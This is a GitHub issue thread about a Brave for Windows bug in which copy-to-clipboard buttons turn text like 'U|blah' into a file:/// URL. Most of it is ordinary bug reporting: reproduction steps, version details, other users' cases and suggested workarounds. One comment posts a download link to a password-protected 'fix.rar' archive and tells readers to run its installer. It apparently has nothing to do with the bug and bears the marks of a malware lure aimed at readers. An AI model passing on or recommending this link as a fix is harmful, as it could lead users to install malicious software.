### ISSUE TITLE
Brave for Windows sometimes copies to clipboard as partial HTML encoding

### ISSUE THREAD

**Issue by JessePeden** [brave/brave-browser#40695]
### Description

Let me preface this by saying that I'm not sure if something changed recently, or if this has simply gone unnoticed until now.

I just noticed today that when using a website's copy-to-clipboard button, depending on what the value is in the field to be copied Brave will sometimes copy the value as HTML encoding rather than a literal string.

I've tried to determine what it is that triggers it to happen, and what I've come up with is that it has something to do with the `|` (vertical pipe) character and if there is a single letter before it (this is important, as anything more than that seems to avoid the bug from triggering), and any length string after it.

For example, if you have a field with `U|blah` and hit the copy-to-clipboard button in/for that field what you end up with is `file:///U:/blah`.

As you can see, that's not correct but also not even complete HTML encoding, as the `|` should have been converted to `%7C`, which should mean the string should have been at least saved as `U%7Cblah`.  To make it stranger, if you have another `|` in another part of the field's value, such as `U|blah|test|string` and use the copy-to-clipboard button,  you will end up with a string of `file:///U:/blah%7Ctest%7Cstring` in the clipboard.

Now, if you DON'T use the copy-to-clipboard button and simply highlight the field's value and manually (CTRL-C or right-click Copy) the value to copy it to the clipboard, Brave saves the value properly and does NOT do any sort of HTML encoding on the string.

I can only replicate this behavior in Brave (not in Edge, Chrome, or Firefox) on Windows.  Brave on macOS does not behave this way.

To see the behavior in action, you can use https://www.w3schools.com/howto/howto_js_copy_clipboard.asp and fill the field with the examples I provided above.

### Steps to reproduce

1. Go to any website that has a copy-to-clipboard button for a text field
2. Fill the field with any of the examples above, or similar.
3. Paste the clipboard into a text editor to view its contents

### Actual result

Brave will sometimes copy the value as HTML encoding rather than a literal string.

### Expected result

Brave should copy as a literal string in all cases.

### Reproduces how often

Easily reproduced

### Brave version (brave://version info)

```
Brave	1.69.153 Chromium: 128.0.6613.85 (Official Build) (64-bit) 
Revision	a69e96756922f88cbce3482971d70cfd1ee6f872
OS	Windows 11 Version 21H2 (Build 22000.3147)
```

### Channel information

- [X] release (stable)
- [ ] beta
- [ ] nightly

### Reproducibility

- [X] with Brave Shields disabled
- [X] with Brave Rewards disabled
- [ ] in the latest version of Chrome

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by JessePeden** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

What is it?

**Comment by Nobuho** [comment]
Same to me. I post some my cases. 

[text] -> [copied text]

file://///// -> file:///
file:/ -> file:///
file:///C:/こんにちは -> file:///C:/%E3%81%93%E3%82%93%E3%81%AB%E3%81%A1%E3%81%AF

I use bookmarklet that generate local folder path from BOX web. I noticed this bug as it doesn't work recently.

**Comment by JessePeden** [comment]
This is still an issue as of:
```
Brave 1.69.168 Chromium: 128.0.6613.138 (Official Build) (64-bit)
Revision: 6918a99aa67f8b2c8cfdc9a44e6ad4f9be6c5be9
OS: Windows 11 Version 21H2 (Build 22000.3197)
```

**Comment by Pyromagne** [comment]
It also happened to me, my workaround is to change or make a profile.

**Comment by JessePeden** [comment]
> It also happened to me, my workaround is to change or make a profile. 

Please explain what you mean.  The issue is with the text being copied, which would remain the same even after creating a new profile.

**Comment by Pyromagne** [comment]
> > It also happened to me, my workaround is to change or make a profile.
> 
> Please explain what you mean. The issue is with the text being copied, which would remain the same even after creating a new profile.

I literally just change my profile and then it came back to normal, it works for me I don't know if it will work in others, or I just face a similar issues but not with this issue entirely, In my observation if when I copied something using copy-to-clipboard button there are some special characters is converted and its not sometimes but always. I tried once to change my profile to see if it still like that, but I got the corrected one. I do not spend times in this issue I just curious, browse in the internet why and then I saw your post.

**Comment by JessePeden** [comment]
> > > It also happened to me, my workaround is to change or make a profile.
> > 
> > 
> > Please explain what you mean. The issue is with the text being copied, which would remain the same even after creating a new profile.
> 
> I literally just change my profile and then it came back to normal, it works for me I don't know if it will work in others, or I just face a similar issues but not with this issue entirely, In my observation if when I copied something using copy-to-clipboard button there are some special characters is converted and its not sometimes but always. I tried once to change my profile to see if it still like that, but I got the corrected one. I do not spend times in this issue I just curious, browse in the internet why and then I saw your post.

Interesting.

**Comment by Nobuho** [comment]
Thank you for sharing. I tried too, but it didn't work for me... I have 2 windows laptops and I've tried with both of them, but these didn't work.

@Pyromagne 
Do you mean you can copy the text "U|blah|test|string" with clipboard script below?
https://www.w3schools.com/howto/howto_js_copy_clipboard.asp

**Comment by Nobuho** [comment]
@JessePeden @Pyromagne 
I tried it today and it worked fine. I don't know why, but it may have been fixed some time ago.

**Comment by JessePeden** [comment]
> @JessePeden @Pyromagne 
> I tried it today and it worked fine. I don't know why, but it may have been fixed some time ago.

I'll check again in the morning but I've been checking with every update to Brave for Windows, and it wasn't fixed as of at least 1 week ago.
